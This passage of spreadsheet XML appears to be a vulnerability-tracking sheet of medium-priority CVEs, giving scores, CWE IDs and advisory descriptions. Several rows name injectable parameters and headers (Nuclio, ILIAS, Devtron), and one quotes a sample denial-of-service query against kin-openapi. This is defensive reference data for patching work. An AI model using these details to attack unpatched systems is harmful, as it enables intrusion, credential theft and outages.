      <c r="F1248" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1248" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1248" s="5" t="inlineStr">
        <is>
          <t>commvault:commvault, linux:linux_kernel, microsoft:windows</t>
        </is>
      </c>
      <c r="I1248" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1248" s="5" t="inlineStr"/>
      <c r="K1248" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="L1248" s="5" t="inlineStr">
        <is>
          <t>CommServe contained a cryptographic signature verification issue affecting privilege management. Software customers upgrade to resolved maintenance release. Update CommServe and Web Server.</t>
        </is>
      </c>
      <c r="M1248" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77105</t>
        </is>
      </c>
    </row>
    <row r="1249">
      <c r="A1249" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1249" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77111</t>
        </is>
      </c>
      <c r="C1249" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1249" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1249" s="5" t="inlineStr"/>
      <c r="F1249" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1249" s="5" t="inlineStr"/>
      <c r="H1249" s="5" t="inlineStr">
        <is>
          <t>adobe:commerce, adobe:commerce_b2b, adobe:magento</t>
        </is>
      </c>
      <c r="I1249" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1249" s="5" t="inlineStr"/>
      <c r="K1249" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L1249" s="5" t="inlineStr">
        <is>
          <t>Adobe Commerce is affected by an Incorrect Authorization vulnerability that could result in a Security feature bypass. An attacker with high privileges could leverage this vulnerability to bypass security measures and gain unauthorized write access, causing a limited disruption to availability. Exploitation of this issue does not require user interaction. Scope is changed.</t>
        </is>
      </c>
      <c r="M1249" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77111</t>
        </is>
      </c>
    </row>
    <row r="1250">
      <c r="A1250" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1250" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77120</t>
        </is>
      </c>
      <c r="C1250" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1250" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1250" s="5" t="inlineStr"/>
      <c r="F1250" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1250" s="5" t="inlineStr"/>
      <c r="H1250" s="5" t="inlineStr"/>
      <c r="I1250" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1250" s="5" t="inlineStr"/>
      <c r="K1250" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1250" s="5" t="inlineStr">
        <is>
          <t>CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability exists that could cause privilege escalation to root and unauthorized execution of administrative functions when an authenticated user with SSH enabled interacts with the operating system console that improperly processes user-controlled input.</t>
        </is>
      </c>
      <c r="M1250" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77120</t>
        </is>
      </c>
    </row>
    <row r="1251">
      <c r="A1251" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1251" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77298</t>
        </is>
      </c>
      <c r="C1251" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1251" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1251" s="5" t="inlineStr"/>
      <c r="F1251" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1251" s="5" t="inlineStr"/>
      <c r="H1251" s="5" t="inlineStr"/>
      <c r="I1251" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J1251" s="5" t="inlineStr"/>
      <c r="K1251" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L1251" s="5" t="inlineStr">
        <is>
          <t>SeaweedFS is a distributed storage system for files and blobs. In versions 4.39 and earlier, the S3 API accepts an external OIDC JWT sent directly in the Authorization header and maps it to an IAM role without enforcing that role's trust policy, so a federated user can assume a role they are not permitted to hold. The standard STS AssumeRoleWithWebIdentity path rejects such a token when the role's trust policy does not trust the token's federated provider, but the direct S3 bearer path validates only the token itself and then authenticates as the mapped role and evaluates that role's attached S3 permissions. As a result, a valid OIDC user whose token would be denied the role through STS can obtain the role's S3 access, including object read, write, and delete, by presenting the raw OIDC JWT directly to the S3 API. This issue is fixed in version 4.40</t>
        </is>
      </c>
      <c r="M1251" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77298</t>
        </is>
      </c>
    </row>
    <row r="1252">
      <c r="A1252" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1252" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77354</t>
        </is>
      </c>
      <c r="C1252" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1252" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1252" s="5" t="inlineStr"/>
      <c r="F1252" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1252" s="5" t="inlineStr"/>
      <c r="H1252" s="5" t="inlineStr"/>
      <c r="I1252" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J1252" s="5" t="inlineStr"/>
      <c r="K1252" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-789</t>
        </is>
      </c>
      <c r="L1252" s="5" t="inlineStr">
        <is>
          <t>kin-openapi is a Go project for handling OpenAPI files. From 0.124.0 until 0.142.0, openapi3filter.sliceMapToSlice in openapi3filter/req_resp_decoder.go converts attacker-controlled sparse indexes from a deepObject query parameter into a dense slice by allocating entries from zero through the largest supplied index, after which buildResObj creates another slice of the same length. This allocation occurs before schema validation, so maxItems does not prevent it. An unauthenticated client can send a small query such as param[items][50000000]=x to an endpoint whose deepObject schema contains an array, forcing multi-gigabyte heap allocation and causing an OOM kill or restart loop. Other request-body encodings and styled parameters that do not produce bracketed integer indexes are not affected. This issue is fixed in version 0.142.0.</t>
        </is>
      </c>
      <c r="M1252" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77354</t>
        </is>
      </c>
    </row>
    <row r="1253">
      <c r="A1253" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1253" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77357</t>
        </is>
      </c>
      <c r="C1253" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1253" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1253" s="5" t="inlineStr"/>
      <c r="F1253" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1253" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H1253" s="5" t="inlineStr"/>
      <c r="I1253" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J1253" s="5" t="inlineStr"/>
      <c r="K1253" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-834</t>
        </is>
      </c>
      <c r="L1253" s="5" t="inlineStr">
        <is>
          <t>Mesop is a Python-based UI framework that allows users to build web applications. Prior to 1.3.3, applications running in debug mode expose a GET /hot-reload endpoint whose unbounded loop depends on the user-supplied counter parameter, allowing an unauthenticated attacker to hold worker threads with high counter values until the worker pool is exhausted and the server becomes unavailable. A single unauthenticated attacker can crash the Mesop server with minimal effort. Because the attack leverages worker exhaustion, the server remains unresponsive until it is manually restarted. This issue is fixed in version 1.3.3.</t>
        </is>
      </c>
      <c r="M1253" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77357</t>
        </is>
      </c>
    </row>
    <row r="1254">
      <c r="A1254" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1254" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77393</t>
        </is>
      </c>
      <c r="C1254" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1254" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1254" s="5" t="inlineStr"/>
      <c r="F1254" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1254" s="5" t="inlineStr"/>
      <c r="H1254" s="5" t="inlineStr"/>
      <c r="I1254" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1254" s="5" t="inlineStr"/>
      <c r="K1254" s="5" t="inlineStr">
        <is>
          <t>CWE-276</t>
        </is>
      </c>
      <c r="L1254" s="5" t="inlineStr">
        <is>
          <t>In Ignition 8.1.53 and earlier, the Gateway "Create Project Role(s)" setting shipped blank, which permitted any authenticated user to create projects (if they can execute gateway scripts). Ignition 8.1.54 restricts project creation to Designer sessions and no longer relies on this setting. The 8.3 series is not affected.</t>
        </is>
      </c>
      <c r="M1254" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77393</t>
        </is>
      </c>
    </row>
    <row r="1255">
      <c r="A1255" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1255" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79707</t>
        </is>
      </c>
      <c r="C1255" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1255" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1255" s="5" t="inlineStr"/>
      <c r="F1255" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1255" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H1255" s="5" t="inlineStr"/>
      <c r="I1255" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1255" s="5" t="inlineStr"/>
      <c r="K1255" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1255" s="5" t="inlineStr">
        <is>
          <t>A Path Traversal vulnerability in the builder endpoint in Google Cloud Agent Development Kit (ADK) versions 1.9.0 through 1.21.0 on Python allows an unauthenticated remote attacker to read arbitrary files using a crafted file_path query parameter.</t>
        </is>
      </c>
      <c r="M1255" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79707</t>
        </is>
      </c>
    </row>
    <row r="1256">
      <c r="A1256" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1256" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79756</t>
        </is>
      </c>
      <c r="C1256" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1256" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1256" s="5" t="inlineStr"/>
      <c r="F1256" s="5" t="n">
        <v>0.051</v>
      </c>
      <c r="G1256" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H1256" s="5" t="inlineStr"/>
      <c r="I1256" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J1256" s="5" t="inlineStr"/>
      <c r="K1256" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1256" s="5" t="inlineStr">
        <is>
          <t>Nuclio is a "Serverless" framework for Real-Time Events and Data Processing. Prior to version 1.17.4, the fix for unauthenticated OS command injection in the nuclio dashboard on the local/Docker platform is incomplete. The fix added validateFunctionName for function names and common.Quote() for the named-resource shell command path, but the list-all resource path (triggered when no specific resource name is provided) still interpolates the resourceNamespace parameter unquoted into a /bin/sh -c command string. An unauthenticated attacker can inject shell metacharacters via the X-Nuclio-Function-Namespace, X-Nuclio-Project-Namespace, or X-Nuclio-Function-Event-Namespace HTTP headers to achieve arbitrary command execution inside the dashboard container. This issue has been patched in version 1.17.4.</t>
        </is>
      </c>
      <c r="M1256" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79756</t>
        </is>
      </c>
    </row>
    <row r="1257">
      <c r="A1257" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1257" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79987</t>
        </is>
      </c>
      <c r="C1257" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1257" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1257" s="5" t="inlineStr"/>
      <c r="F1257" s="5" t="inlineStr"/>
      <c r="G1257" s="5" t="inlineStr"/>
      <c r="H1257" s="5" t="inlineStr"/>
      <c r="I1257" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1257" s="5" t="inlineStr"/>
      <c r="K1257" s="5" t="inlineStr">
        <is>
          <t>CWE-470</t>
        </is>
      </c>
      <c r="L1257" s="5" t="inlineStr">
        <is>
          <t>A remote, authenticated, non-admin Craft CMS Control Panel user with only the accessCp permission can execute operating system commands as the PHP web worker.</t>
        </is>
      </c>
      <c r="M1257" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79987</t>
        </is>
      </c>
    </row>
    <row r="1258">
      <c r="A1258" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1258" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79989</t>
        </is>
      </c>
      <c r="C1258" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1258" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1258" s="5" t="inlineStr"/>
      <c r="F1258" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1258" s="5" t="inlineStr"/>
      <c r="H1258" s="5" t="inlineStr"/>
      <c r="I1258" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J1258" s="5" t="inlineStr"/>
      <c r="K1258" s="5" t="inlineStr">
        <is>
          <t>CWE-285</t>
        </is>
      </c>
      <c r="L1258" s="5" t="inlineStr">
        <is>
          <t>The vulnerability allows any authenticated user to change their own password without providing the current password or having an active elevated session. It also allows the attacker to change other users’ passwords if the attacker’s account has Edit users permission (which doesn’t allow changing others’ passwords) and lacks Administrate users permission (which is required to change others’ passwords).</t>
        </is>
      </c>
      <c r="M1258" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79989</t>
        </is>
      </c>
    </row>
    <row r="1259">
      <c r="A1259" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1259" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81640</t>
        </is>
      </c>
      <c r="C1259" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1259" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1259" s="5" t="inlineStr"/>
      <c r="F1259" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1259" s="5" t="inlineStr"/>
      <c r="H1259" s="5" t="inlineStr"/>
      <c r="I1259" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1259" s="5" t="inlineStr"/>
      <c r="K1259" s="5" t="inlineStr">
        <is>
          <t>CWE-798</t>
        </is>
      </c>
      <c r="L1259" s="5" t="inlineStr">
        <is>
          <t>An attacker could derive the camera's Wi-Fi password and connect to its wireless network. This weakens or eliminates the security value of the access-point password and may expose the live video stream, device services, status interfaces, and firmware-update functionality.</t>
        </is>
      </c>
      <c r="M1259" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81640</t>
        </is>
      </c>
    </row>
    <row r="1260">
      <c r="A1260" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1260" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82064</t>
        </is>
      </c>
      <c r="C1260" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1260" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1260" s="5" t="inlineStr"/>
      <c r="F1260" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1260" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H1260" s="5" t="inlineStr"/>
      <c r="I1260" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1260" s="5" t="inlineStr"/>
      <c r="K1260" s="5" t="inlineStr">
        <is>
          <t>CWE-617</t>
        </is>
      </c>
      <c r="L1260" s="5" t="inlineStr">
        <is>
          <t>A security issue in MongoDB Server allows an unauthenticated network user to cause a denial of service on a specific type of replica set member. The server contains an assertion in its read concern processing logic that can be reached without authentication, and the assertion's assumptions about internal state do not hold for all member configurations, causing the server process to terminate.</t>
        </is>
      </c>
      <c r="M1260" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82064</t>
        </is>
      </c>
    </row>
    <row r="1261">
      <c r="A1261" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1261" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82075</t>
        </is>
      </c>
      <c r="C1261" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1261" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1261" s="5" t="inlineStr"/>
      <c r="F1261" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1261" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H1261" s="5" t="inlineStr"/>
      <c r="I1261" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1261" s="5" t="inlineStr"/>
      <c r="K1261" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L1261" s="5" t="inlineStr">
        <is>
          <t>An uncontrolled resource consumption weakness exists in the request-handling path of the MongoDB sharded-cluster router process. A client that has network access to a router port and has not authenticated can supply connection-monitoring parameters that cause the server to expend CPU resources without any rate limiting, degrading or denying service to legitimate clients. No authentication, elevated privileges, or user interaction is required. Only availability is affected; data confidentiality and integrity are not impacted.</t>
        </is>
      </c>
      <c r="M1261" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82075</t>
        </is>
      </c>
    </row>
    <row r="1262">
      <c r="A1262" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1262" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82538</t>
        </is>
      </c>
      <c r="C1262" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1262" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1262" s="5" t="inlineStr"/>
      <c r="F1262" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1262" s="5" t="inlineStr"/>
      <c r="H1262" s="5" t="inlineStr"/>
      <c r="I1262" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1262" s="5" t="inlineStr"/>
      <c r="K1262" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L1262" s="5" t="inlineStr">
        <is>
          <t>ILIAS before versions 9.22, 10.10, and 11.3 contains a SQL injection vulnerability in the repository trash table where the table navigation sort field from HTTP requests is passed directly into the ORDER BY clause of a SQL query without validation against declared sortable columns. Authenticated users with write permission on any container can inject arbitrary SQL through the sort parameter, and because multi-statement execution is enabled in the database layer, stacked queries enable full database read and write access as well as administrator account takeover.</t>
        </is>
      </c>
      <c r="M1262" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82538</t>
        </is>
      </c>
    </row>
    <row r="1263">
      <c r="A1263" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1263" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82639</t>
        </is>
      </c>
      <c r="C1263" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1263" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1263" s="5" t="inlineStr"/>
      <c r="F1263" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1263" s="5" t="inlineStr"/>
      <c r="H1263" s="5" t="inlineStr"/>
      <c r="I1263" s="5" t="inlineStr">
        <is>
          <t>2026-08-30</t>
        </is>
      </c>
      <c r="J1263" s="5" t="inlineStr"/>
      <c r="K1263" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L1263" s="5" t="inlineStr">
        <is>
          <t>NextChat versions from 2.15.8 through 2.16.1 contain an improper URL validation vulnerability in the proxy endpoint that allows attackers to obtain the server's OpenAI API key. The x-base-url header is validated using substring matching instead of hostname parsing, allowing any URL containing 'api.openai.com' to pass validation and receive the server's credentials in the Authorization header.</t>
        </is>
      </c>
      <c r="M1263" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82639</t>
        </is>
      </c>
    </row>
    <row r="1264">
      <c r="A1264" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1264" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82882</t>
        </is>
      </c>
      <c r="C1264" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1264" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1264" s="5" t="inlineStr"/>
      <c r="F1264" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1264" s="5" t="inlineStr"/>
      <c r="H1264" s="5" t="inlineStr"/>
      <c r="I1264" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J1264" s="5" t="inlineStr"/>
      <c r="K1264" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L1264" s="5" t="inlineStr">
        <is>
          <t>Devtron through 2.2.0 fails to enforce authorization checks on the GET /orchestrator/api-token/webhook endpoint, allowing authenticated users to retrieve admin API tokens. Attackers with any authenticated account can query the endpoint with arbitrary project, environment, and application parameters to retrieve plaintext super-admin JWT tokens for full platform control.</t>
        </is>
      </c>
      <c r="M1264" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82882</t>
        </is>
      </c>
    </row>
    <row r="1265">
      <c r="A1265" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1265" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83605</t>
        </is>
      </c>
      <c r="C1265" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1265" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1265" s="5" t="inlineStr"/>
      <c r="F1265" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1265" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1265" s="5" t="inlineStr"/>
      <c r="I1265" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J1265" s="5" t="inlineStr"/>
      <c r="K1265" s="5" t="inlineStr">
        <is>
          <t>CWE-91</t>
        </is>
      </c>
      <c r="L1265" s="5" t="inlineStr">
        <is>
          <t>xmldom is a pure JavaScript W3C standard-based (XML DOM Level 2 Core) DOMParser and XMLSerializer module. Prior to @xmldom/xmldom versions 0.8.14 and 0.9.11, and in xmldom version 0.6.0 and earlier, Element.setAttribute() calls the private _createAttribute(name) path without validating the attribute name, while Document.createAttribute(name) validates against QName. XMLSerializer.serializeToString() emits attribute names verbatim, and requireWellFormed: true did not validate them, so a crafted name can terminate the intended attribute and inject additional attributes, including event handlers, into browser-consumed output; synthesized xmlns:PREFIX declarations expose the same unchecked-name boundary. This issue is fixed in @xmldom/xmldom versions 0.8.14 and 0.9.11; no fixed version is available for xmldom.</t>
        </is>
      </c>
      <c r="M1265" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83605</t>
        </is>
      </c>
    </row>
    <row r="1266">
      <c r="A1266" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1266" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83606</t>
        </is>
      </c>
      <c r="C1266" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1266" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1266" s="5" t="inlineStr"/>
      <c r="F1266" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1266" s="5" t="inlineStr">
        <is>
          <t>java, node.js</t>
        </is>
      </c>
      <c r="H1266" s="5" t="inlineStr"/>
      <c r="I1266" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J1266" s="5" t="inlineStr"/>
      <c r="K1266" s="5" t="inlineStr">
        <is>
          <t>CWE-1333, CWE-400</t>
        </is>
      </c>
      <c r="L1266" s="5" t="inlineStr">
        <is>
          <t>xmldom is a pure JavaScript W3C standard-based (XML DOM Level 2 Core) DOMParser and XMLSerializer module. From 0.9.0-beta.9 until 0.9.11, the processing-instruction production in lib/grammar.js lets the greedy S+ separator and lazy Char*? data group repeatedly repartition a long whitespace tail when the required closing ?&gt; is absent. Both parsePI and parseProcessingInstruction apply the expression to the entire remaining source, causing quadratic backtracking during DOMParser.parseFromString() under default options and allowing a small unauthenticated XML input to stall the Node.js event loop. This issue is fixed in @xmldom/xmldom version 0.9.11.</t>
        </is>
      </c>
      <c r="M1266" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83606</t>
        </is>
      </c>
    </row>
    <row r="1267">
      <c r="A1267" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1267" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83607</t>
        </is>
      </c>
      <c r="C1267" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1267" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1267" s="5" t="inlineStr"/>
      <c r="F1267" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1267" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1267" s="5" t="inlineStr"/>
      <c r="I1267" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J1267" s="5" t="inlineStr"/>
      <c r="K1267" s="5" t="inlineStr">
        <is>
          <t>CWE-91</t>
        </is>
      </c>
      <c r="L1267" s="5" t="inlineStr">
        <is>
          <t>xmldom is a pure JavaScript W3C standard-based (XML DOM Level 2 Core) DOMParser and XMLSerializer module. Prior to @xmldom/xmldom versions 0.8.14 and 0.9.11, and in xmldom version 0.6.0 and earlier, Document.createElement(tagName) stores an unvalidated element name and XMLSerializer.serializeToString() emits that name verbatim. The requireWellFormed: true path did not validate the element qualified name or synthesized xmlns:PREFIX declaration, so attacker-controlled tag names could inject attributes, elements, or processing instructions into serialized XML or HTML and could cause cross-site scripting when browser-consumed. The unchecked values violate the XML QName constraint, and default serialization and creation-time createElement() behavior remain permissive. This issue is fixed in @xmldom/xmldom versions 0.8.14 and 0.9.11; no fixed version is available for xmldom.</t>
        </is>
      </c>
      <c r="M1267" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83607</t>
        </is>
      </c>
    </row>
    <row r="1268">
      <c r="A1268" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1268" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83608</t>
        </is>
      </c>
      <c r="C1268" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1268" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1268" s="5" t="inlineStr"/>
      <c r="F1268" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1268" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1268" s="5" t="inlineStr"/>
      <c r="I1268" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J1268" s="5" t="inlineStr"/>
      <c r="K1268" s="5" t="inlineStr">
        <is>
          <t>CWE-91</t>
